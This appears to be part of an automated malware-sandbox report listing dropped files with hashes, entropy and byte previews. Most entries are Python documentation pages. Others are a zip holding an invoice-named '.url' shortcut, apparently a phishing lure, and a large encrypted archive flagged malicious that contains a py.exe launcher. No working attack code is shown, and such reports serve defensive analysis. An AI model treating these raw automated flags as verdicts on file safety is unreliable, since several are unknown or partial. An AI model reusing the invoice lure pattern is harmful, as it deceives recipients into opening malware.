    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Weak Reference Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/weakref.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python supports weak references as first-class objects. There are two specific object types which directly implement weak references. The first is a simple reference object, and the second acts as ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python supports weak references as first-class objects. Ther
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
    Category:dropped
    Size (bytes):675259
    Entropy (8bit):4.856751844355368
    Encrypted:false
    SSDEEP:
    MD5:F402DCF60031500AD86915A4C405C838
    SHA1:02AA786E32EA4CEBCB6A274D5B651EDAA526F613
    SHA-256:DD5338F76262FD40AABC17A7B83F23944AB7D57D9380AE3FD65D00627CAF11F4
    SHA-512:91444282340FC1F69DA075777BB9198008A521CE767089AB33462E93D2A7FDFA936B4479E5650770ECCFF8FB6EFD9750A6DD1D1E6DDC354C7F0FD0CE642A3319
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python Documentation contents" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/contents.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="What.s New in Python- What.s New In Python 3.12- Summary . Release highlights, New Features- PEP 695: Type Parameter Syntax, PEP 701: Syntactic formalization of f-strings, PEP 684: A Per-Interprete..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="What.s New in Python- What.s New In Python 3.12-
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
    Category:dropped
    Size (bytes):12864
    Entropy (8bit):4.823832589679693
    Encrypted:false
    SSDEEP:
    MD5:B64CC95E76E1344FE6A1F473F0264D1E
    SHA1:0BCEDA1D62C52149B556D0C48F87A43E155BFFF5
    SHA-256:72456BDA320FF36A301507C6F5C9E9708AC9BA0520D706041DF3CB8DBD381786
    SHA-512:D5CE4B7DE72683B5A909180F3E8E475F5110FB54F8B3150A39C2ECAECB1D3461E9FAA20BD7D78DCF3B9FAE6B0FC64A207F1BF80B4C1A29874D0239FD3B0A3744
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Copyright" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/copyright.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python and this documentation is: Copyright . 2001-2023 Python Software Foundation. All rights reserved. Copyright . 2000 BeOpen.com. All rights reserved. Copyright . 1995-2000 Corporation for Nati..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python and this documentation is: Copyright . 2001-2023 Python Software Fo
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
    Category:dropped
    Size (bytes):11225
    Entropy (8bit):4.834028944953228
    Encrypted:false
    SSDEEP:
    MD5:AA98E4B44174255266A7A00F40D3ED2E
    SHA1:98E0A6820AA0248EE8B460675483DEA068D6FE18
    SHA-256:D179527D477CF1DBE985F0D290CB124E2C8DB72ED93C10D028006BCC64F73412
    SHA-512:0E2DD3BA8C0A5517EA00081A73618F9CBF7F560F5C6F0746EE5313B2DD6D44648F02CB50E0B092446DDC1159CDB6764D48FE26E02C935FAB941DB1FE92AF141D
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Distributing Python Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/distributing/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Distributing Python Modules &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="styles
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
    Category:dropped
    Size (bytes):11573
    Entropy (8bit):4.906855752254527
    Encrypted:false
    SSDEEP:
    MD5:D77806F56E09EB3943877DEA8140B54F
    SHA1:A4C1A245C50A44E32935D9B337E21D6A069C0F89
    SHA-256:68F161A7423CB26CA625F43196381D49738EE8719ABCA18242495C9F24BC9366
    SHA-512:31641273939C424E58E9D833892E9DC9D384E6DD7C39750AD4F2C388B3E8135BF461B26C9AD6C4396E674CB7C028B1F0E2EDD64D61A2BE40ACCC03AE1DB1C745
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Download &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sea
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (567), with CRLF line terminators
    Category:dropped
    Size (bytes):19562
    Entropy (8bit):4.91258489409245
    Encrypted:false
    SSDEEP:
    MD5:046738F5DA1DD5ADEEC508C034190BD9
    SHA1:C704874DDF1496497664AF5EF26650AD2110DBC4
    SHA-256:8A6095CA82F6C83787B64AC36F716360D55071095E7F71EE95C6F6FA6894FA66
    SHA-512:1C7CA5B739B190EDDEE62E7D3E928A596619B4184342C994ECF6A70F341A99B8BBA95A083908BF4D4D24FC4C8ED96B93A4BBED6F6F5DC0701948F2B7F7AF1D05
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="4. Building C and C++ Extensions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/building.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A C extension for CPython is a shared library (e.g. a.so file on Linux,.pyd on Windows), which exports an initialization function. To be importable, the shared library must be available on PYTHONPA..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A C extension for CPython is a shared library
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (670), with CRLF line terminators
    Category:dropped
    Size (bytes):56687
    Entropy (8bit):4.828816641446644
    Encrypted:false
    SSDEEP:
    MD5:156C1761D37930F00A53D75A2C7B21D3
    SHA1:294E28A82956F15D68CFC75F621772EA48A62EC5
    SHA-256:03A894BC646595421B43A9DAC8288F8ABA607E37EE62022E94BB8491096C96A6
    SHA-512:E7B9E515C398894B1CCB8A320D9CAD4670F4B849F2A2BDBFA8BB7AA90D0A140E8562ADE35131DF7EB6BA9BB2BCF9DF5733BF1EA296FCFF26CE6B04685762F51D
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Embedding Python in Another Application" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/embedding.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The previous chapters discussed how to extend Python, that is, how to extend the functionality of Python by attaching a library of C functions to it. It is also possible to do it the other way arou..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The previous chapters discussed ho
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Zip archive data, at least v1.0 to extract, compression method=store
    Category:dropped
    Size (bytes):0
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:
    MD5:CA08B7C4D6C36CC626901EA71C8393CE
    SHA1:99BC50769D13B7C0538B6CE3BDD2AB72FDD29A3A
    SHA-256:9FAA125F7DB9F7299DE8A3E20771F5F2BF2F27E4AFCDB4E2AD18BF8D6731D533
    SHA-512:4F336D5FF3D432D4909FF8D7505585B6556837DB5BD19B20CA887BFAA1D3F9BF60AA3539D615813CFD750354C2D36903F2C346111FCE3994E035D9F80252F67E
    Malicious:false
    Reputation:unknown
    Preview:PK........[..Y............'...Rechnung - 201528807699 vom 30.07.2024/PK........`..Y............Q...Rechnung - 201528807699 vom 30.07.2024/Rechnung - 201528807699 vom 30.07.2024.url5.A..0......fI`0(2H..Jx..c..L?...D.=.z./..J;4.3X.....J.%.dc..p~......hj.<Z...=.v0..I;...)o...(2..GY.9...@I.d.[Rr.<.I.J...b.F;.f...o_..{n9{.W2..1%.PK..........[..Y............'.$...............Rechnung - 201528807699 vom 30.07.2024/.. ...........:.......:.......X...PK..........`..Y............Q.$....... ...E...Rechnung - 201528807699 vom 30.07.2024/Rechnung - 201528807699 vom 30.07.2024.url.. .............................PK..............K.....
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Zip archive data, at least v1.0 to extract, compression method=store
    Category:dropped
    Size (bytes):0
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:
    MD5:CA08B7C4D6C36CC626901EA71C8393CE
    SHA1:99BC50769D13B7C0538B6CE3BDD2AB72FDD29A3A
    SHA-256:9FAA125F7DB9F7299DE8A3E20771F5F2BF2F27E4AFCDB4E2AD18BF8D6731D533
    SHA-512:4F336D5FF3D432D4909FF8D7505585B6556837DB5BD19B20CA887BFAA1D3F9BF60AA3539D615813CFD750354C2D36903F2C346111FCE3994E035D9F80252F67E
    Malicious:false
    Reputation:unknown
    Preview:PK........[..Y............'...Rechnung - 201528807699 vom 30.07.2024/PK........`..Y............Q...Rechnung - 201528807699 vom 30.07.2024/Rechnung - 201528807699 vom 30.07.2024.url5.A..0......fI`0(2H..Jx..c..L?...D.=.z./..J;4.3X.....J.%.dc..p~......hj.<Z...=.v0..I;...)o...(2..GY.9...@I.d.[Rr.<.I.J...b.F;.f...o_..{n9{.W2..1%.PK..........[..Y............'.$...............Rechnung - 201528807699 vom 30.07.2024/.. ...........:.......:.......X...PK..........`..Y............Q.$....... ...E...Rechnung - 201528807699 vom 30.07.2024/Rechnung - 201528807699 vom 30.07.2024.url.. .............................PK..............K.....
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Zip archive data, at least v1.0 to extract, compression method=store
    Category:dropped
    Size (bytes):637
    Entropy (8bit):5.94223599892476
    Encrypted:false
    SSDEEP:
    MD5:CA08B7C4D6C36CC626901EA71C8393CE
    SHA1:99BC50769D13B7C0538B6CE3BDD2AB72FDD29A3A
    SHA-256:9FAA125F7DB9F7299DE8A3E20771F5F2BF2F27E4AFCDB4E2AD18BF8D6731D533
    SHA-512:4F336D5FF3D432D4909FF8D7505585B6556837DB5BD19B20CA887BFAA1D3F9BF60AA3539D615813CFD750354C2D36903F2C346111FCE3994E035D9F80252F67E
    Malicious:false
    Reputation:unknown
    Preview:PK........[..Y............'...Rechnung - 201528807699 vom 30.07.2024/PK........`..Y............Q...Rechnung - 201528807699 vom 30.07.2024/Rechnung - 201528807699 vom 30.07.2024.url5.A..0......fI`0(2H..Jx..c..L?...D.=.z./..J;4.3X.....J.%.dc..p~......hj.<Z...=.v0..I;...)o...(2..GY.9...@I.d.[Rr.<.I.J...b.F;.f...o_..{n9{.W2..1%.PK..........[..Y............'.$...............Rechnung - 201528807699 vom 30.07.2024/.. ...........:.......:.......X...PK..........`..Y............Q.$....... ...E...Rechnung - 201528807699 vom 30.07.2024/Rechnung - 201528807699 vom 30.07.2024.url.. .............................PK..............K.....
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:Zip archive data, at least v2.0 to extract, compression method=store
    Category:modified
    Size (bytes):45737661
    Entropy (8bit):7.995197935968748
    Encrypted:true
    SSDEEP:
    MD5:46799F5539D87FB7F8903391597EAD44
    SHA1:E1E5C20B3D2A6B4A9B38B17491C3360EA9F40350
    SHA-256:0B71DB25197256055D8BADEF607C2A9F189CD265D9D907E217001D3530A41EFE
    SHA-512:52BEC783F89FA27C63EFB3F1B292B1E70D93CACD2D6844701804A7D9C6E8FA7E30E3EE50AD19B7430B43EB1C071B971994997399819C493D1C56B3F97B7176F9
    Malicious:true
    Reputation:unknown
    Preview:PK...........X................Python/Launcher/PK........Vv.Xn...44..........Python/Launcher/py.exe.{|.E...L..Cz....!@.h.#.H...$*..1...X..8."tC\..;....rwau....]v....$....<.1..(..]t+.j........$.{.......q.tWW.:u....).k..(....t]..../W.....AH..Z..c.{..,s..ug......w...L...z.a)..e.....{(}......^.l..!.2..+'O.3.t.H.........e#^d..G\...G.F8.......{n|wd6.[8b..p.,....p..oG..].y.}?.`;..'.W..X......f^..`.lI.F.<A...dy)A.8./..[......y...s;?..|.]...6v...M-..R.J.....[..`.u#.....P.F.p.......w...m......eU....L..a_.}a..a...K.$.H..</...+.......9....6(..}.Ep...W,.1.y_A.....K.[......<.\p....7S......u.og...c..:.>......u.....u.F[t.Wi.....A.."..5....b..?.^x'.w.U*bU.X.EW....bA}|.>.].........E.%P..7.c.=.NlP[i..Qu...N..8|.M..t.. l..f..}jm......>._*.>...v....p...P/...t}..#..Yi.C]bAG.k.<}.b.x..*.l.M.,.=.....k(,9..em.VLp.+T(.u..V(.3l.4.j.|z.....a........bh.:A;Aq......S.-.O. .Od[).....[G.Q...@....}z...p:.b.t. ..f.`F....~|...&u= ..U..P....f........F\...G/..)...c....&.?3...
    Process:C:\Windows\System32\svchost.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):55
    Entropy (8bit):4.306461250274409
    Encrypted:false
    SSDEEP:
    MD5:DCA83F08D448911A14C22EBCACC5AD57
    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
    Malicious:false
    Reputation:unknown
    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
    No static file info